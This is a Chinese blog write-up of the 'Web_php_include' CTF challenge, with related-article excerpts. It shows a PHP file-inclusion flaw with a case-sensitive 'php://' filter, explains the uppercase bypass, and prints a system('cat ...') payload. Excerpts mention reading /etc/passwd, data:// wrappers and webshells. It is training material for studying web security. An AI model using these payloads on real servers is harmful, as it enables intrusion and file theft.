攻防世界-web-Web_php_include

最新推荐文章于 2023-07-16 13:23:59 发布
最新推荐文章于 2023-07-16 13:23:59 发布
阅读量99 收藏
点赞数
分类专栏: web 绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wallacegen/article/details/108761945
版权
web 同时被 2 个专栏收录
10 篇文章 0 订阅
订阅专栏
绕过
2 篇文章 0 订阅
订阅专栏 
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

源文件中用strstr过滤掉了php://,但是strstr区分大小写(可以mark一下,过滤的方法之一就是看是否大小写敏感)。然后用postman POST一些数据。
在这里插入图片描述body里面传入php代码
在这里插入图片描述response里面有一个文件flag is here
在这里插入图片描述然后继续post php代码

<?php system("cat fl4gisisish3r3.php")?>

在这里插入图片描述

wallacegen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[吃烤羊腿烫烫烫] Web_php_include 题解分析
布屿
02-28 3270
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 0.分析代码 我们先来分析一下代码吧。 &lt...
常见Web安全漏洞的实际案例和攻防技术
最新发布
02-15
### 常见Web安全漏洞的实际案例和攻防技术 #### 一、SQL注入攻击与防范 **实际案例** 在Web开发中,SQL注入是一种常见的安全威胁,它允许攻击者通过向应用程序发送恶意SQL代码来操纵数据库。例如,考虑一个简单的...
XCTF-攻防世界CTF平台-Web类——4、Web_php_includephp中strstr()函数绕过、数据流协议)
Onlyone_1314的博客
11-14 3042
目录标题一级目录方法一、文件包含:php伪协议绕过strstr()函数方法二、文件包含:GET方式提交命令方法三、data://伪协议方法四、一句话木马连接后台方法五、data://伪协议+一句话木马 一级目录 打开题目地址: 代码: <?php show_source(__FILE__); echo $_GET['hello']; //输出hello变量指向的内容 $page=$_GET['page']; //把page变量的值赋给$page while (strstr($page
攻防世界-Web-Web_php_include
uh_eng的博客
08-05 334
0x01 打开题目,代码如下: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 构造payload简单验证一下是不是文件包含: ?hello=xxx&page=/etc/passwd 结果如下:
web_进阶_Web_php_include
JURUO222的博客
08-07 198
先分析这段php代码 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> strstr:查找字符串第一次出现,并返回字符串的剩余部分 str_replace:str_replace() 函数以其他字符替换字符串
php伪协议总结
a3320315的博客
09-29 2001
0x01 首先放源码 <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 0x02 分析 s...
upload-labs.rar
03-19
Upload-labs是一个专注于Web安全领域...通过Upload-labs靶场的实践,不仅可以提升安全测试技能,还能加深对Web安全攻防的理解,对于从事Web开发、渗透测试和安全审计等相关工作的人员来说,这是一个非常有价值的资源。
web渗透测试技巧(下)
10-12
- **漏洞示例**:例如,在以下代码中,`$_GET['file']`可以直接被用户控制,如果开发者没有对其进行适当的验证,则攻击者可以通过修改URL中的`file`参数来读取服务器上的任何文件:`include($_GET['file']);...
Mang0-php文件包含漏洞.zip
03-12
PHP中,`include`、`require`、`include_once`和`require_once`等函数用于将其他文件的内容插入到当前脚本中。当这些函数的参数来自不受信任的源,如HTTP请求,就可能引发问题。 ### Mang0的案例分析 "Mang0-php...
PHP常见安全漏洞攻防研究.pdf
01-05
"PHP常见安全漏洞攻防研究" PHP 是一种广泛使用的服务器端脚本语言,拥有强大功能和灵活的语法,使得 Web 开发者能够快速开发包含动态页面的 Web 应用程序。然而,由于 PHP 对开发人员要求很低和开发人员的疏忽,...
攻防世界 Web_php_include wp
weixin_55029563的博客
07-22 1547
<?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 首先看到一串PHP代码。 strstr函数:查找字符串首次出现的位置。返回字符串剩余部分 strstr($page, "php://")在page变量中查找p
WEBWeb_php_include(多解)
sleepywin的博客
07-16 1167
解题
攻防世界-Web_php_include
weixin_45694388的博客
10-20 231
分析: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { //查找“php://“在$page中是否存在,存在则进入循环 $page=str_replace("php://", "", $page); //把$page中的"php://"换成空,而且该函数区分大小写 } include($page);.
CTF题目记录5
kkzzjx
05-22 1729
Web_php_include <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page);//此处为文件包含,执行page中的内容 ?> 考察基础的文件包含,过滤了php:// page变量可以操控 思路:先找flag文件的
攻防世界-Web_php_include详解
Mr_helloword的博客
08-11 8771
Web_php_include 源代码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 分析: strstr(): 定义和用法: 搜索字符串在另一个字符串中是否存在,如果是,返回字符串及剩余部分,否则返回
攻防世界web高手区(1-6)
bilala的博客
08-03 359
* baby_web 题目描述:想想初始页面是哪个 根据题目描述的提示,访问index.php后发现重定向,尝试抓包 访问得到flag:flag{very_baby_web} * Training-WWW-Robots 访问robots.txt,发现有访问得到flagcyberpeace{eac017d052248ca0093cc503b9e8ff07} php_rce Web_php_include <?phpshow_source(__FILE__);echo $_GET['he
CTF(Web方向练习题)(持续更新)
m0_56010012的博客
02-23 5129
1.Training-WWW-Robots 打开应用场景,如下: 网址后面添加/robots.txt 查看其中内容(robots协议也叫robots.txt(统一小写)是一种存放于网站根目录下的ASCII编码的文本文件),内容如下: 根据提示,访问/fl0g.php,得到flag值。 ...
文件包含漏洞
nobugnomoney的博客
03-23 5041
一、文件包含漏洞原理 PHP语言提供的文件包含功能太强大,太灵活,所以包含漏洞常常出现在PHP中,但不只是PHP中有包含漏洞,其他语言也有包含漏洞,如java等,本篇主要以PHP为例讲解原理及其利用技巧: PHP提供4个文件包含的函数 1、include():找不到文件时继续执行,只会警告 2、include_once():与include()类似,只是如果文件中的代码已被包含,则不会再次包含 3、require():找不到文件时会爆出致命的错误; 4、require_once():与上述的类似; 1、本地
文件包含
hulitong的博客
10-17 1112
0x01 函数分析 <?phpshow_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page);?> strstr(): 定义和用法:搜索字符串在另一个字符串中是否存在,如果是,返回字符串及剩余部分,否则返回false。 strstr
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值